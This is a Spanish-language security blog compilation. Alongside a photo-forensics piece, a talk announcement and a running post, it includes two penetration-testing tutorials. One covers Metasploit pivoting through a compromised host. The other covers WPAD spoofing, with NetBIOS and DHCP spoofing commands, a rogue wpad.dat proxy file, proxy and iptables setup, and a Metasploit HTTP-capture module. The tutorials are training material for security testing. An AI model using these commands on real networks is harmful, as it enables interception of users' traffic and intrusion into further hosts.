El Maravilloso Mundo del Photoshop

Aprovechando el fin de semana para actualizarme con el Google Reader, me encontré con un interesante post de Neal Krawetz sobre unas fotos trucadas del primer mandatario de Corea del Norte.

Según la BBC y el UK's Times, la siguiente foto de Kim Jong Il habría sido modificada, lo que daría lugar a especulaciones sobre su salud. Lo que mas llama la atención de esta foto, es una raya de los bloques del escenario, que a la altura de las rodillas de Kim Jong Il desaparecen justo donde se encuentra el.

Neal realizo un interesante análisis refutando las teorías de estos medios, y explica que entre otras cosas Corea del Norte no tiene tradición de trucar fotos, al contrario de otros países, y que Kim Jong Il suele vestirse con la misma ropa como una estrategia para dificultar que lo sitúen en espacio y tiempo.

Siempre me llama la atención el interés que genera en los medios de habla inglesa el análisis de fotografías, ya sea porque las mismas poseen connotaciones políticas o porque se puede visualizar la ropa interior de una cantante de moda.

Pero también me asombra con que facilidad algunos medios de comunicación, en especial los británicos, generan problemas de seguridad interior en sus países.

En el último COMBAT training, mientras trabajamos en el módulo de Information Gathering, Alexander me paso el link de un interesante hecho ocurrido en Abril del 2009 en UK.

Varios periodistas que se encontraban cubriendo una noticia, filmaron la llegada de Bob Quick, el Jefe de Anti-Terrorismo de UK. Parece ser que Bob bajo con una carpeta bajo el brazo, en donde después de una ampliación de la imagen, se podía ver claramente el listado de lugares en Londres, en donde la policía realizaría allanamientos por sospechas de terrorismo durante la siguiente semana.

Obviamente Bob fue invitado a renunciar...

Otro hecho interesante sucedió en UK en Mayo del 2008, cuando la Ministra de Vivienda, Caroline Flint, fue fotografiada dirigiéndose a una reunión de estado en donde iba a exponer datos confidenciales de su ministerio.

Nuevamente al ampliar la imagen de los papeles que llevaba en la mano, se podían visualizar datos confidenciales sobre el negro futuro de los inmuebles en UK con la crisis mundial todavía sin conocerse, lo que permitió a muchos especuladores hacerse de información confidencial y sumamente valiosa.

Este último dato lo obtuve de una presentación de Christian Martorella, a quien tuve el gusto de conocer hace algunas semanas cuando visitaba Buenos Aires.

Christian me comento que jugaba al ping-pong con la gente de s21sec, asi que fue desafiado a jugar en la mesa que tenemos en base4 security, y si bien tuvo suerte y me gano a mi, fue aplastado por el resto de nuestro staff... hehehe :P

En un próximo post les contare sobre el ranking de ping-pong de base4 security.. ;-)

Posts relacionados:
- Los Metadatos de Cristina
- Bin Laden esta muerto
- Una imagen vale más...

Más info:
- Neal Krawetz: Not Shirt, No Shoes, No Shopping
- Neal Krawetz: A Fire In Their Heart
- BBC: 'Fake photo' revives Kim rumours
- DIGG: North Korea Sucks at Photoshop
- TIME: Kim Jong-il: Doctored Photos?

Explotando el Eslabón Más Débil

El próximo Jueves 4 de Junio voy a dar una charla en ADACSI, el capítulo local de ISACA, sobre Client Side Attacks.

Esta es la primera de una serie de charlas que dictará BASE4 Security S.A. durante este año, como forma de concientizar a las organizaciones sobre los riesgos de seguridad a los que esta expuesto hoy en día.

TITULO: Explotando el Eslabón Más Débil

DESCRIPCION:
Los atacantes evolucionan a un ritmo mucho mayor al que lo hacen nuestras propias defensas. Mientras que nosotros nos hemos focalizado en segurizar el perímetro de nuestra red, ellos ya hace tiempo que se encuentran atacando a los usuarios.

Durante el transcurso de esta charla, veremos porque los criminales informáticos han decidido atacar a los usuarios, y realizaremos varias demostraciones prácticas para ilustrar de que forma están explotando el eslabón más débil de nuestra arquitectura de seguridad.

FECHA: Jueves 04 de junio de 2009

HORARIO: De 9.30 a 11.00 Hs.

LUGAR: Edificio SIGEN - Av. Corrientes 389 Piso 1- CABA

Para inscripción e informes contactarse con ADACSI de 11.00 a 18.00hs, al teléfono (54-11) 4317-2855 o al 4312-8111 int. 2918, o por correo electrónico: info@adacsi.org.ar

LA ENTRADA ES LIBRE Y GRATUITA

Pivoting con MetaSploit

Una pregunta recurrente durante los COMBAT trainings, es como atacar a un host desde otro al cual ya hemos ganado acceso con MetaSploit.

Una forma sencilla de hacerlo, es utilizando el comando "route" de MetaSploit, que nos va a permitir atacar un host, ruteando el tráfico por otro host al que ya tenemos acceso.

El primer paso es explotar una vulnerabilidad usando como payload a meterpreter:

msf> use [exploit]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [victima1]
msf> exploit

Una vez que estamos dentro de meterpreter, salimos de la sesión presionando "CTRL-Z", al hacerlo nos va a indicar el ID de la sesión.

Luego, vamos a crear una ruta para VICTIMA2 indicando su IP y máscara, junto al ID de sesión que tenemos con meterpreter (1 en este caso). Hay que tener en cuenta que el comando "route" que vamos a utilizar, no es el mismo comando "route" que esta dentro de la shell de meterpreter.

Si no estamos seguros cual era el ID de sesión, podemos verificarlo con el comando "sessions -l":

meterpreter>

CTRL-Z

msf> route add [victima2] 255.255.255.255 1

En este ejemplo, usamos esta máscara porque solamente queremos llegar a ese host, pero podríamos hacerlo para todo un segmento (192.168.1.0/255.255.255.0).

Finalmente lanzamos el exploit contra la VICTIMA2 pasando por VICTIMA1, lo cual podemos verificar si realizamos un "netstat -na" en el ultimo host:

msf> use [exploit]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [victima2]
msf> exploit

Próximamente mas tips con MetaSploit.

WPAD reloaded (?)

El ataque de WPAD ya tiene algunos años de existencia, pero no por ello deja de ser efectivo. Esta es una virtud de gran parte de los ataques "de red", que no se ven afectados por el paso del tiempo.

Un ejemplo muy reciente, fue el defacing de la Web de Metasploit en Junio del año pasado, realizado por unos hackers chinos que comprometieron el ISP que daba hosting a Metasploit.com, y desde otro sistema en el mismo segmento de red realizaron un ataque de MiTM con ARP Poisoning.

WPAD "Web Proxy Auto-Discovery" nace de la necesidad de configurar el Proxy de los browsers de los usuarios automáticamente. Brevemente, la idea es buscar en la red al sistema que posea el nombre "WPAD", utilizando los protocolos DNS, DHCP o NetBIOS, y luego descargar desde la web de WPAD el archivo "wpad.dat", que contiene algunas lineas de JavaScript que le indicaran al browser cual es la direccion del Proxy que debe utilizar.

La idea del ataque, es hacernos pasar por el sistema WPAD, para indicarle al usuario que utilice un Proxy "falso", y luego capturar toda la información que pase por este Proxy.

El protocolo WPAD, nunca paso de ser un Draft, pero originalmente utilizaba solo DNS y DHCP. Algo muy gracioso con la implementación de DNS era que la búsqueda se realizaba por "WPAD[.dominio]", y podía llegar a pasar que busque "wpad.buenosaires.empresa.com", luego "wpad.empresa.com", y finalmente "wpad.com".

Como no podía ser de otra forma, alguien registro el dominio "wpad.com". Afortunadamente el dueño del sitio www.wpad.com, al recibir miles de visitas totalmente inesperadas, se percato del problema, y simplemente tiene on-line un mensaje explicativo para los usuarios desprevenidos.

Pero lo realmente genial del Draft de WPAD, se encuentra en el punto 9, "Security Considerations", donde se encuentra la gloriosa frase:

"Minimally, it can be said that the WPAD protocol does not create new security weaknesses."

Para que el browser utilice WPAD, debe tener activado "Detectar la configuracion automaticamente", lo cual no es un problema, ya que Windows viene configurado de esta forma desde Windows 98SE hasta el reciente Windows Vista.

En un dominio de Windows con DNS y DHCP, una forma muy sencilla de crear una entrada de DNS falsa a través de DHCP, es la siguiente:

dhcpcd -h WPAD -i eth0

Otra forma, podría ser spoofeando el nombre WPAD con un NetBIOS Spoofer como nbnspoof.py de Robert Wesley McGrew. De esta forma cada vez que un usuario pregunte por el nombre WPAD, nosotros automáticamente responderíamos, pero obviamente estaríamos compitiendo con el servidor de nombres real, al que deberíamos realizarle algún tipo de DoS para que sea mas lento que nosotros al responder:

python nbnspoof.py -v -i eth0 -n "[WPAD]" -h IP_del_Hacker -m MAC_del_Hacker

Existen otras formas de spoofear el nombre WPAD, pero están son efectivas. También hay otros nombres interesantes a los cuales se podría atacar como ISASRV o CALCSERVER.

Una vez que los usuarios se dirigen al sistema WPAD, deberíamos crear en el root del webserver, el archivo "wpad.dat" con la información del Proxy falso. El archivo "wpad.dat" debería tener este formato:

# cd /var/www/htdocs/

# vi wpad.dat

function FindProxyForURL(url, host)
{
return “PROXY proxy.kungfoo.com.ar:8080;
DIRECT”;
}

Como Proxy, podemos utilizar Squid, o si lo queremos hacer sencillo tinyproxy, en donde deberíamos verificar el puerto en donde esta escuchando, y que se encuentre permitida la red en la que estamos:

# vi /usr/local/etc/tinyproxy/tinyproxy.conf

Port 8080
Allow 10.0.0.0/8

# tinyproxy -d

Finalmente para que nuestro Proxy falso forwardee los paquetes, deberíamos tener una regla de iptables apuntando a la IP y puerto del Proxy, como la siguiente:

/sbin/iptables -t nat -A PREROUTING -s 10.0.0.0/255.0.0.0 -p tcp -m tcp --dport 8080 -j DNAT --to-destination 10.10.10.10

Ahora si todo esto les parece demasiado trabajo, simplemente pueden Spoofear WPAD y levantar Metasploit, que servirá automáticamente un archivo "wpad.dat", y permitirá capturar los pedidos HTTP. No va a forwardear los paquetes pero sin dudas van a obtener algunas cosas interesantes:

msf > use auxiliary/server/capture/http
msf auxiliary(http) > exploit
[*] Auxiliary module running as background job
[*] Server started.

Esto es todo con WPAD, y próximamente mas ataques de red del baúl de los recuerdos... ;-)

Media Maratón del CDC

Hoy por la mañana, corrí la Media Maratón del Club de Corredores, un recorrido de 21km por los bosques de Palermo.

Esta fue mi tercer media maratón, y pude mejorar mi tiempo de 1:50 del año pasado a 1:43 este año!

Creo que el desafío mas grande fue convencer a mi hermano y a un amigo de levantarse un Domingo a las 8am para que sean mis "aguateros" personales :-P

Muchas gracias a RaXr y Cinic por todo el acompañamiento durante los 21km, y especialmente a los Trotadores Urbanos con los que entreno todas las semanas!

- Mas fotos en mi Album de Picassa.
- The day after the Marathon (yo solo tengo la mitad de este dolor)